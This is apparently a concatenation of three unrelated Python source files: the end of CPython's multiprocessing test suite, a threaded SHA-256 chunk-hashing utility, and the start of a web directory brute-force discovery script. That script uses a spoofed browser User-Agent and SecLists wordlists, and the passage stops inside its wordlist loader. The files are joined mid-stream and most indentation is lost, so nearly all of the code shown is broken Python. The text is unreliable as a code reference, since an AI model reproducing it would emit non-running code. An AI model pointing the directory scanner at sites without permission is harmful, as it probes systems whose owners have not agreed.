killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with contextlib.ExitStack() as stack:
if should_die:
stack.enter_context(self.assertWarnsRegex(
UserWarning,
"semaphore_tracker: process died"))
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
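# Generation scheme (sketch of what follows): every _Test* subclass of
# BaseTestCase is combined with one mixin per entry in its ALLOWED_TYPES,
# producing e.g. _TestListenerClient + ProcessesMixin ->
# WithProcessesTestListenerClient; plain unittest.TestCase classes are
# re-exported unchanged under their own names.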
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
pyhash.py | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Prints sha256 hashes of chunks of a file from the command line.
Chunks are at most 8 MiB in size (the last chunk can be smaller). Chunks are hashed
using separate threads (the number of threads depends on the number of CPUs).
Performance will depend almost entirely on the ability of the filesystem to
read a file sequentially in large blocks, or on the ability of python to hash
large blocks efficiently.
On most operating systems, Python will defer sha256 checksum computation to
openssl that contains multiple very optimized implementations of the sha256
algorithm, and will opportunistically use whatever specialized cpu instructions
are available to it to perform this computation as quickly as possible.
Computing hashes at rates of multiple gigabytes per second on a laptop using
this code is not unheard of.
"""
import contextlib
import hashlib
import io
import multiprocessing
import queue
import sys
import threading
from concurrent import futures
from typing import TYPE_CHECKING, List, Optional, Tuple
_result = Tuple[int, bytes]
if TYPE_CHECKING:
_result_queue = queue.Queue[Optional[futures.Future[_result]]]
else:
_result_queue = queue.Queue
_CHUNK_SIZE = 8 << 20 # size in bytes: 8MiB
def compute_hash(buf: bytes) -> _result:
"""Uses all the cpu :)
According to documentation this should end up releasing the GIL,
so that we get to use more threads.
Args:
buf: data to hash, immutable - so there's hope in zerocopy here.
Returns:
block size and digest
"""
h = hashlib.sha256()
h.update(buf)
return len(buf), h.digest()
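# A minimal single-threaded reference for the chunking scheme described in the
# module docstring; a sketch for comparison only, the threaded pipeline below
# (read_file plus a ThreadPoolExecutor) is the actual implementation. Raw
# reads may return short chunks, so chunk boundaries can differ from
# read_file's, which fills each buffer completely.
def sequential_chunk_hashes(f: io.RawIOBase):
    while True:
        buf = f.read(_CHUNK_SIZE)
        if not buf:  # b'' (EOF) or None (no data available)
            break
        yield compute_hash(buf)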
def read_file(
f: io.RawIOBase,
executor: futures.Executor,
q: _result_queue,
stop_reading: threading.Event,
):
try:
while not stop_reading.is_set():
# make a bytearray and try very hard to fill it.
buf = memoryview(bytearray(_CHUNK_SIZE))
ntotal: int = 0
nread: int = 1
while nread > 0:
# As of 2020-06-01: typeshed wrongly claims we can't
# `readinto(memoryview)`, so we disable type checking.
nread = f.readinto(buf[ntotal:]) or 0 # type: ignore
ntotal += nread
if ntotal == 0: # end of file when we can't fill any
return
q.put(executor.submit(compute_hash, buf[:ntotal]))
finally:
q.put(None) # signal end of queue to the printer
def print_hashes(q: _result_queue):
total_size = 0
while True:
hash_future = q.get()
if hash_future is None: # end of queue
break
length, digest = hash_future.result()  # type: int, bytes
print("offset: {}, hash: {}".format(total_size, digest.hex()))
total_size += length
print(f"Total size: {total_size}")
def main(args: List[str]):
if len(args) != 1:
    print("Usage: ./pyhash.py <filename>")
    return 1
filename = args[0]
with contextlib.ExitStack() as stack:
f = open(filename, "rb", buffering=0)
stack.callback(f.close)
q: _result_queue
q = queue.Queue(maxsize=max(50, multiprocessing.cpu_count() * 2))
cpus = multiprocessing.cpu_count()
executor = futures.ThreadPoolExecutor(max_workers=cpus)
stack.callback(executor.shutdown)
stop_reading = threading.Event()
# start filling the queue with eagerly evaluated futures.
reader_t = threading.Thread(
target=read_file, args=(f, executor, q, stop_reading)
)
reader_t.start()
@stack.callback
def stop_and_join_reader():
stop_reading.set()
try:
while True:
q.get(block=False)
except queue.Empty:
pass # we've emptied the queue
reader_t.join()
print_hashes(q)
if __name__ == "__main__":
sys.exit(main(args=sys.argv[1:]))
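# Example invocation (hash values and sizes illustrative):
#
#   $ ./pyhash.py big_file.bin
#   offset: 0, hash: <64 hex chars>
#   offset: 8388608, hash: <64 hex chars>
#   Total size: 16777216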
|
web_directory_discovery.py | #! /usr/bin/python
# -----------------------------------------------------------------------------------------------------------------------------
# GENERAL
# -----------------------------------------------------------------------------------------------------------------------------
#
# author: Sebastiaan Van Hoecke
# mail: sebastiaan@sevaho.io
#
# NOTE:
#
# -----------------------------------------------------------------------------------------------------------------------------
import sys
import getopt
import urllib3
import certifi
import threading
from queue import Queue
import os
# -----------------------------------------------------------------------------------------------------------------------------
# GLOBAL VARIABLES
# -----------------------------------------------------------------------------------------------------------------------------
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'
url_queue = Queue()
lists_dir = '/home/sevaho/GitHub/SecLists/Discovery/Web-Content/'
url_base = 'https://sevaho.io/'
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
# -----------------------------------------------------------------------------------------------------------------------------
# FUNCTIONS
# -----------------------------------------------------------------------------------------------------------------------------
def usage ():
print("Usage: %s [OPTIONS]... [ARGS]... \
\n \
\n description\
\n \
\nOPTIONS:\
\n \
\n -h, * display the help and exit\
\n -t, --target specify target \
\n -l, --listdir specify a directory containing wordlist text files \
\n \
\nEXAMPLES:\
\n \
\n ./webspy.py -t https://example.com -l my_custom_wordlist_directory \
\n \
\nNOTE:\
\n \
" % (sys.argv[0]))
sys.exit(1)
def expand_queue ():
    for r, d, f in os.walk(lists_dir):
        for file in f:
